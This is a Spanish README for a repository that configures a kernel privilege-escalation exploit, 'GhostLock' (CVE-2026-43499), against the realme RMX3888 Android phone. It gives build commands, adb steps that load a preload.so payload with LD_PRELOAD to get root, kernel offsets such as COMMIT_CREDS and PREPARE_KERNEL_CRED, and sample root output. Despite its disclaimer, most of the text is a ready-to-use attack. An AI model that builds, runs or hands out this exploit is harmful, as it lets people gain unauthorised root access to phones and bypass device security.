
Configuración del exploit CVE-2026-43499 para realme RMX3888 (Android 16) - 20 offsets de kernel verificados
Este repositorio contiene los archivos de configuración completos para el exploit CVE-2026-43499 (GhostLock) dirigido al dispositivo realme RMX3888. Todos los offsets del kernel se han extraído y verificado desde el boot.img del dispositivo.
✓ 20 offsets de kernel verificados extraídos de vmlinux
✓ Registro en tiempo real con O_SYNC + fsync para seguridad ante pánico del kernel
✓ Configuración específica del dispositivo para RMX3888
✓ Script de compilación con un clic con detección automática de NDK
✓ Documentación completa con guías de compilación
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
En Git Bash para Windows, el script detecta automáticamente la ruta SDK predeterminada utilizada por Android Studio y las herramientas de línea de comandos: /c/Android/Sdk/ndk/*.
Nota: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL y COPY_SPLICE_READ utilizan actualmente respaldos compatibles con la compilación en la cabecera de destino RMX3888. Reemplázalos con offsets verificados de vmlinux de RMX3888 antes de depender del comportamiento en tiempo de ejecución.
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Check logs
adb shell cat /sdcard/Download/log_*.txt
Los offsets principales que aparecen a continuación se extrajeron del kernel 6.1.141. Consulta la nota anterior para conocer las entradas de respaldo compatibles con la compilación que aún requieren verificación específica para RMX3888.
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets
El módulo de registro en tiempo real integrado proporciona:
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
Consulta BUILD_GUIDE.md para obtener instrucciones detalladas de solución de problemas, incluidos:
⚠️ ADVERTENCIA: Esta configuración es solo para investigación de seguridad autorizada.
Esta configuración se proporciona únicamente con fines educativos y de investigación de seguridad.
Este repositorio contiene materiales de investigación de seguridad. Los autores y colaboradores no son responsables de ningún uso indebido ni de los daños causados por este código. Úsalo bajo tu propio riesgo y solo en dispositivos de tu propiedad o para los que tengas autorización explícita de prueba.
Generado: 2026-07-23
Versión del kernel: 6.1.141-android14-11-o-gffc54a6d2287
Verificación de offsets: 100 % (20/20)
Estado: Listo para compilación